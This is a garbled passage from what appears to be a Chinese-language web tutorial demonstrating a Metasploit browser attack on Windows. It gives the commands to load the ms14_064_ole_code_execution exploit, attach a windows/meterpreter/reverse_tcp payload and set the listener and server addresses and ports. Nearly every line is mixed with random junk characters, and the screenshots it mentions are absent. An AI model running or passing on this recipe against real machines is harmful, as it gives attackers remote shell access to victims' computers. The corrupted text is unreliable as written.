0 _" Z9 b* x+ w; T4 f* v* V8 Z% i
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示5 H0 D" G* }) c* }
/ L1 s* W' c" u: @; q8 Z
' m: s( @0 `& q L' v, [' H 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
7 L, m0 a, E7 d5 x
! X: l4 M, k' O% E m$ | `
9 ~ I+ p) Z$ X 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
; V" L' _; ^: D8 E B1 J: I3 F
3 x6 }, r9 n! |( ? \5 U! N! G, o6 L x# K8 s$ \* c$ v9 M# e4 H. f1 ]
set AllowPowershellPrompt true1 n' _4 L0 r' U2 e9 ]5 Q; o% h
$ `0 E) P8 E7 M) t8 s) X. l1 f* B5 N
5 [( c: i1 R8 d Set LHOST 192.168.0.109$ b4 o7 C- A b/ z1 t1 y+ a% n6 g" s
' U5 K8 a; b" e: [3 J" ? x
+ q3 S$ ?! y5 S; F9 s set SRVHOST 192.168.0.109
- Z$ R5 [ \, q) c' i/ |# N
2 ]! d% h0 t* k8 n B/ z1 N
' }% @0 e$ ]; j1 K- @ Set uripath share
; X0 f0 V# U ~/ C: d) e
2 k2 W1 k# T# J% z) _% ?2 z- Q& t6 B2 w& e& E! _$ B/ v( L
Set srvport 80
2 E0 x1 ?! C4 d! P- `
6 t8 L, }5 H: R1 @; q
( P; `1 T1 [$ ~" x/ D2 n
( D1 s2 _% Y0 m6 {; c5 G; W: }( _
8 j; ?8 H4 n. d, @/ h/ ~2 P8 P
0 B% q$ q0 O2 Q
: K5 Z( U U$ R' G
1 k- p; f& A2 U) Z
4 I" a0 {: y( l
3 u9 j ^& B. T$ v! d6 L2 J
4 I) T! U2 Q" {' p* K
) f5 w0 }* ]/ @
9 F- V% @. I, j, ]. c2 O% Q
" I8 @' @( F# z* U1 _9 a) n. r+ s+ s
: t: b) Q# k ~5 m, i
7 c$ O' ?' K% U0 Z+ s5 K4 W
k: G* S6 z6 }3 H: s8 s 下面我们来访问本地地址如图:
# p* v* _* c' S/ ?- L1 q
, B* f \6 @, x3 {/ V
8 l" q& F0 k Y5 [( O: `
' A' e/ {3 x2 ^3 r' K8 F, O
& H8 D( H& o' a4 C0 I$ f
! w3 m s6 F. i! t
# e5 V6 t; x& S' |
7 v1 d7 A, @2 u- h- q
6 H2 D0 j% f" a# O+ y: u
: X$ Q7 h$ J' `5 M6 j: O